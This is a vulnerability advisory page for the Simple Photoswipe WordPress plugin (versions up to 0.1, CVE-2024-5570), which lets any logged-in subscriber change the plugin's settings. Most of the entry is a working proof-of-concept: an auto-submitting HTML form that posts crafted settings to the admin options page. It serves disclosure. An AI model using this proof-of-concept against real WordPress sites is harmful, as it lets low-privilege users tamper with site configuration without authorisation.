Lucene search
CaonWPEX-ID:49B3A8CB-F606-4CF7-80EC-BFDAFD74E848HistoryJun 07, 2024 - 12:00 a.m.
Simple Photoswipe <= 0.1 - Subscriber+ Arbitrary Settings Update
2024-06-0700:00:00
caon
6
photoswipe arbitrary update
html form
security exploit
403 response
Description The plugin does not have authorisation check when updating its settings, which could allow any authenticated users, such as subscriber to update them
<html>
<body>
<form action="http://WP/wp-admin/options-general.php" method="POST">
<input type="hidden" name="bar_size" value="anything" />
<input type="hidden" name="indexIndicatorSep" value="anything" />
<input type="hidden" name="loop_images" value="1" />
<input type="hidden" name="show_close_element" value="1" />
<input type="hidden" name="show_fullscreen_element" value="1" />
<input type="hidden" name="show_zoom_element" value="1" />
<input type="hidden" name="show_share_element" value="1" />
<input type="hidden" name="show_counter_element" value="1" />
<input type="hidden" name="show_arrow_element" value="1" />
<input type="hidden" name="show_preloader_element" value="1" />
<input type="hidden" name="tap_to_toggle_controls" value="1" />
<input type="hidden" name="photoswipe_save" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
the response of the request above is 403, but the settings update still happensRelated
nvd
nvd
CVE-2024-5570
2024-06-28 06:15:06
wpvulndb
wpvulndb
Simple Photoswipe <= 0.1 - Subscriber+ Arbitrary Settings Update
2024-06-07 00:00:00
cvelist
cvelist
cve
cve
CVE-2024-5570
2024-06-28 06:15:06
6.6 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:49B3A8CB-F606-4CF7-80EC-BFDAFD74E848